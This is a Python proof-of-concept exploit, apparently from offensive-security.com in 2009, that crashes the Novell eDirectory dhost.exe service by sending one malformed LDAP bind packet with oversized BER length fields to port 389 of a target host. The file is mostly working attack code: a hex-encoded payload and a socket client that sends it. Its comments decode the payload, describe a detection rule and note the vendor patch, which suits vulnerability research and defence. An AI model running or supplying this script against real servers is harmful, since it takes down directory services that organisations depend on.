#!/usr/bin/python
# 22/03/2009
# Novell eDirectory 883ftf3 nldap module DOS
# Matteo Memelli - offensive-security.com
# ryujin ___ @ ___ offensive-security.com
#
# A malformed LDAP bind packet can crash the dhost.exe service.
# 24/03/2009 Vendor notification; patched in 885 release
#
import sys
from socket import *
# Proof-of-concept client for the crash described in this file's header
# comment: it opens one TCP connection to the LDAP port of the host named in
# sys.argv[1], sends a single 128-byte message, prints whatever comes back and
# exits. The header reports the issue as fixed in the 885 release, so upgrading
# is the remediation the page itself gives.
#
# This is a Python 2 script: `payload` is a byte string, and the parenthesised
# single-argument print calls below behave exactly like the print statement.
payload = (
    # 0x30 0x7E opens a BER SEQUENCE that declares 126 content bytes, which
    # matches the 128-byte total. The run 84 FF FF FF FF occurs twice (once
    # here, once across the line break below); read as a BER length, 0x84
    # introduces a four-octet long-form length, i.e. 0xFFFFFFFF, far larger
    # than the enclosing message.
    # NOTE(review): the page does not say which field the nldap parser trips
    # on; the oversized inner lengths are the presumed trigger. For detection,
    # an LDAP PDU on port 389 whose inner declared length exceeds the outer
    # SEQUENCE length is invalid and can be flagged or dropped by a
    # protocol-validating IDS rule or proxy.
    "\x30\x7E\x02\x02\x01\x60\x77\x02\x84\xFF\xFF\xFF\xFF\x03\x04\x84"
    # From the fifth byte of the next line onward the data is plain ASCII:
    # "dc=uaregonnacrash,dc=com" repeated and joined with "+", followed by a
    # final "dc=com" and the trailing bytes 0x80 0x00.
    "\xFF\xFF\xFF\xFF\x64\x63\x3D\x75\x61\x72\x65\x67\x6f\x6e\x6e\x61"
    "\x63\x72\x61\x73\x68\x2C\x64\x63\x3D\x63\x6F\x6D\x2B\x64\x63\x3D"
    "\x75\x61\x72\x65\x67\x6f\x6e\x6e\x61\x63\x72\x61\x73\x68\x2C\x64"
    "\x63\x3D\x63\x6F\x6D\x2B\x64\x63\x3D\x75\x61\x72\x65\x67\x6f\x6e"
    "\x6e\x61\x63\x72\x61\x73\x68\x2C\x64\x63\x3D\x63\x6F\x6D\x2B\x64"
    "\x63\x3D\x75\x61\x72\x65\x67\x6f\x6e\x6e\x61\x63\x72\x61\x73\x68"
    "\x2C\x64\x63\x3D\x63\x6F\x6D\x2B\x64\x63\x3D\x63\x6F\x6D\x80\x00"
)

# Plain (non-TLS) LDAP port used by the original script.
LDAP_PORT = 389

sock = socket(AF_INET, SOCK_STREAM)
print('connecting...')
# The target host is read only at this point, after the first status line,
# so a missing argument raises IndexError here.
sock.connect((sys.argv[1], LDAP_PORT))
print('sending payload...')
sock.send(payload)
# No timeout is set: recv() blocks until the peer replies or the connection
# is closed.
reply = sock.recv(1024)
print(reply)
sock.close()
print('Done!')